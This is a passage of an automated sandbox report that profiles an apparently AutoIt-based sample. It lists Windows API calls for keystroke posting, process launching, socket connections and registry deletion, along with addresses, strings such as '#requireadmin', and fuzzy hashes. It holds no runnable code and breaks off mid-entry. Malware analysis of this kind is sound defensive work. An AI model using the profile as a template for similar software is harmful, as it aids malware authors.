                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: b1344db24f2ed037d942933efb2d701d895cc4e2189bb6cf579e0d7504b7c1a3
                                                          • Instruction ID: 25e3a7f68cf926ec75d7fba107c71e7a61b54d5bbf202899b3d6173348f61b98
                                                          • Opcode Fuzzy Hash: b1344db24f2ed037d942933efb2d701d895cc4e2189bb6cf579e0d7504b7c1a3
                                                          • Instruction Fuzzy Hash: 8771AD34600684AFDB219F66D8D1FBBBBB9EF09300F144069F965973A2C731AE41DB60
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CDF448
                                                          • _memset.LIBCMT ref: 00CDF511
                                                          • ShellExecuteExW.SHELL32(?), ref: 00CDF556
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                            • Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9
                                                          • GetProcessId.KERNEL32(00000000), ref: 00CDF5CD
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CDF5FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: c3b57ad952fa90f3b6a416d50b752e5f7f84ef71c050eea451e9e66b71900c25
                                                          • Instruction ID: 39d443f9651062cc4225985565b277b8bd91cc011e36f2e97e60f3abd47f3570
                                                          • Opcode Fuzzy Hash: c3b57ad952fa90f3b6a416d50b752e5f7f84ef71c050eea451e9e66b71900c25
                                                          • Instruction Fuzzy Hash: 8A619175A00619DFCB15EF94C4819AEBBF5FF48314F14806EE956AB391CB30AE42DB90
                                                          APIs
                                                          • GetParent.USER32(?), ref: 00CC0F8C
                                                          • GetKeyboardState.USER32(?), ref: 00CC0FA1
                                                          • SetKeyboardState.USER32(?), ref: 00CC1002
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CC1030
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CC104F
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CC1095
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CC10B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 6de1ad83a07f2eeace67ef1453fd7e164a91053dfd1a754a0b87292070d97252
                                                          • Instruction ID: cbec3a6f1a5a782e7776aec85dc824a589853d6fa413ae1dd6302463236b4d03
                                                          • Opcode Fuzzy Hash: 6de1ad83a07f2eeace67ef1453fd7e164a91053dfd1a754a0b87292070d97252
                                                          • Instruction Fuzzy Hash: 0851EFA09046D57DFB324275CC55FBABEA95B07300F0C858DE5E4868C3C398AEC9D751
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 00CC0DA5
                                                          • GetKeyboardState.USER32(?), ref: 00CC0DBA
                                                          • SetKeyboardState.USER32(?), ref: 00CC0E1B
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CC0E47
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CC0E64
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CC0EA8
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CC0EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 22f0c40e91f367020372d3c693986ff3b3da8c0e74e756d451eade0702616f5f
                                                          • Instruction ID: bfb9d8ec546504f7d8ccc7f6148f2db04cf84ed8867b39c0ef26b4d9b7b81a88
                                                          • Opcode Fuzzy Hash: 22f0c40e91f367020372d3c693986ff3b3da8c0e74e756d451eade0702616f5f
                                                          • Instruction Fuzzy Hash: 5551E6A09447D5BDFB324374CC55F7A7FA95B06300F18888DE1E5868C3C795AE94E760
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 1cc7d34204fe4c8c17f94e874f7db36fa46e4de7596e8f6b78eb088bfe010620
                                                          • Instruction ID: 94c4c160fbc6457d26da70cb3f097a46939cc2147ca1827a5889452167f38f0e
                                                          • Opcode Fuzzy Hash: 1cc7d34204fe4c8c17f94e874f7db36fa46e4de7596e8f6b78eb088bfe010620
                                                          • Instruction Fuzzy Hash: 0B41A375C1161476CB11FBB4CC8AACFB3B89F04310F50895AF919E3221EB34A785D7AA
                                                          APIs
                                                            • Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CC3697,?), ref: 00CC468B
                                                            • Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CC3697,?), ref: 00CC46A4
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00CC36B7
                                                          • _wcscmp.LIBCMT ref: 00CC36D3
                                                          • MoveFileW.KERNEL32(?,?), ref: 00CC36EB
                                                          • _wcscat.LIBCMT ref: 00CC3733
                                                          • SHFileOperationW.SHELL32(?), ref: 00CC379F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: a3460a6eb4670bb225f5e4c2f0f85704872f23e9469dbf7fa68d6b06e51d8ebd
                                                          • Instruction ID: a58feb893b33a412e97e30864db734ecd1769273156c71bfa1a4546e111e7b4d
                                                          • Opcode Fuzzy Hash: a3460a6eb4670bb225f5e4c2f0f85704872f23e9469dbf7fa68d6b06e51d8ebd
                                                          • Instruction Fuzzy Hash: 34417CB1108384AAC755EF64D895FDFB7E8AF88380F00482EF49AC3251EA34D7899756
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CE72AA
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE7351
                                                          • IsMenu.USER32(?), ref: 00CE7369
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE73B1
                                                          • DrawMenuBar.USER32 ref: 00CE73C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: d8bf2d65dddb6242a1e0a7dd668dd2e7b088dae124e6e315eceafaa7aefe06a3
                                                          • Instruction ID: 088fed51f3f3d1281b6dc39df9437b3a0401ddcdd4cd548999713633806ac2f2
                                                          • Opcode Fuzzy Hash: d8bf2d65dddb6242a1e0a7dd668dd2e7b088dae124e6e315eceafaa7aefe06a3
                                                          • Instruction Fuzzy Hash: 98412A75A44289EFDB20DF51D884EAABBF4FB04314F14962AFD159B260D730AE50DF60
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00CE0FD4
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CE0FFE
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00CE10B5
                                                            • Part of subcall function 00CE0FA5: RegCloseKey.ADVAPI32(?), ref: 00CE101B
                                                            • Part of subcall function 00CE0FA5: FreeLibrary.KERNEL32(?), ref: 00CE106D
                                                            • Part of subcall function 00CE0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CE1090
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CE1058
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: 957d96d6a62898989109ccd3ac94335438c977e7045854b1da7fc9ba48e7e862
                                                          • Instruction ID: 1e51fdca3281ff7fa3aef9ef1e5ee7a8ad55bf95e5b7bd153a3d72eb149450fe
                                                          • Opcode Fuzzy Hash: 957d96d6a62898989109ccd3ac94335438c977e7045854b1da7fc9ba48e7e862
                                                          • Instruction Fuzzy Hash: 33314B71900149BFEB14DF91DC89EFFB7BCEF08310F04016AE912A2141EB709F969AA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CE62EC
                                                          • GetWindowLongW.USER32(00F96388,000000F0), ref: 00CE631F
                                                          • GetWindowLongW.USER32(00F96388,000000F0), ref: 00CE6354
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CE6386
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CE63B0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CE63C1
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CE63DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 4eadc4b18268f8b3ec54b4dd86327c6f41644de77c4bbe9b420a12dc39f4bda5
                                                          • Instruction ID: 266d1371e1478e262a70384ada103481043ed676dcb73e243b3ff19afa557f1c
                                                          • Opcode Fuzzy Hash: 4eadc4b18268f8b3ec54b4dd86327c6f41644de77c4bbe9b420a12dc39f4bda5
                                                          • Instruction Fuzzy Hash: AF313430650280AFDB21CF1AEC84F5837E5FB6A754F1801A8F521CF2B2CB71AD419B51
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDB2E
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDB54
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00CBDB57
                                                          • SysAllocString.OLEAUT32(?), ref: 00CBDB75
                                                          • SysFreeString.OLEAUT32(?), ref: 00CBDB7E
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00CBDBA3
                                                          • SysAllocString.OLEAUT32(?), ref: 00CBDBB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: b78389d4641aa7ab969b635774d90e4c7021e073b4dbc93e16dd0de18c9b83ed
                                                          • Instruction ID: c239dd9087ef0646ee5d66791d5967f21f3c6fe4117f222e4c95815c13af515d
                                                          • Opcode Fuzzy Hash: b78389d4641aa7ab969b635774d90e4c7021e073b4dbc93e16dd0de18c9b83ed
                                                          • Instruction Fuzzy Hash: 0C219536600219AFDF10DFA9DC84DFF73ACEB09360F118569F915DB290E6709D458764
                                                          APIs
                                                            • Part of subcall function 00CD7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CD7DB6
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CD61C6
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CD61D5
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CD620E
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00CD6217
                                                          • WSAGetLastError.WSOCK32 ref: 00CD6221
                                                          • closesocket.WSOCK32(00000000), ref: 00CD624A
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CD6263
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 4d73668b653b50fd6c45b96400a6a44d2b3846397b7b9bfdf4d17a59c75d5643
                                                          • Instruction ID: 1d84f4c0ea55c9c3edd332512bc34c5cf817dc6f9582738ed0c89548340eef52
                                                          • Opcode Fuzzy Hash: 4d73668b653b50fd6c45b96400a6a44d2b3846397b7b9bfdf4d17a59c75d5643
                                                          • Instruction Fuzzy Hash: D331A171600118AFEF20AF64CC85BBE77ADEB45710F04402AFE15AB291DB74AD05DBA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: 01a4e70c7942139d6f64836197326703f39b865afc1411be487547ed01310b46
                                                          • Instruction ID: b242fd6e808b085354000632f154b1c51608a49bfe6b6c17cbf6b38ca2104189
                                                          • Opcode Fuzzy Hash: 01a4e70c7942139d6f64836197326703f39b865afc1411be487547ed01310b46
                                                          • Instruction Fuzzy Hash: 7F21467220511566D231FA35AC02FF773E8EF55744F10403EF99696291EF509E43E399
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDC09
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CBDC2F
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00CBDC32
                                                          • SysAllocString.OLEAUT32 ref: 00CBDC53
                                                          • SysFreeString.OLEAUT32 ref: 00CBDC5C
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00CBDC76
                                                          • SysAllocString.OLEAUT32(?), ref: 00CBDC84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: bd71e5978841176f3242f636fa48cf38ec04d9afedc00f3f6845a7a02aeb7c9b
                                                          • Instruction ID: a5de62502188f374cf8ce1c93e978848db0518d59156c932399a65ef2ba45c55
                                                          • Opcode Fuzzy Hash: bd71e5978841176f3242f636fa48cf38ec04d9afedc00f3f6845a7a02aeb7c9b
                                                          • Instruction Fuzzy Hash: F2214435604245AF9B10EFA8DC88EFB77ECEB09360F108129F915CB2A1E674DD81CB64
                                                          APIs
                                                            • Part of subcall function 00C61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C61D73
                                                            • Part of subcall function 00C61D35: GetStockObject.GDI32(00000011), ref: 00C61D87
                                                            • Part of subcall function 00C61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C61D91
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CE7632
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CE763F
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CE764A
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CE7659
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CE7665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 744bd3a8af563b877536d980205230fdb1b302635583180d1296e78f219851e9
                                                          • Instruction ID: 14ba5075cc05896862f86b5dbda1cb5a72dccf58e5317107803e9c6eea4e93ab
                                                          • Opcode Fuzzy Hash: 744bd3a8af563b877536d980205230fdb1b302635583180d1296e78f219851e9
                                                          • Instruction Fuzzy Hash: 5711B2B2150259BFEF118F65CC85EEB7F6DEF08798F014214FA04A60A0CB729C21DBA4
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C83F85), ref: 00C84085
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00C8408C
                                                          • EncodePointer.KERNEL32(00000000), ref: 00C84097
                                                          • DecodePointer.KERNEL32(00C83F85), ref: 00C840B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: 55a2b2a8d31c7c280a5fcb319f3c28dd25172459b69e038036375ad83c3292e7
                                                          • Instruction ID: da0e20723c9eeaf1c87436077249a54c31a6fb39e51e83bf25574b6668e6ded0
                                                          • Opcode Fuzzy Hash: 55a2b2a8d31c7c280a5fcb319f3c28dd25172459b69e038036375ad83c3292e7
                                                          • Instruction Fuzzy Hash: F5E08C70681300EFEB31AF60EC4DB0A3AA4B724742F00403CF621E92B0CBBB4212CB25
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 3c037621285d4c4bc268f6a5655e9fe130a60969c43cc08e6de04250ccfb155e
                                                          • Instruction ID: e749db556f13c9d5a93fed119dfd7c3d657ce4bd2f8fcbe5d5127707ff6e7fe9
                                                          • Opcode Fuzzy Hash: 3c037621285d4c4bc268f6a5655e9fe130a60969c43cc08e6de04250ccfb155e
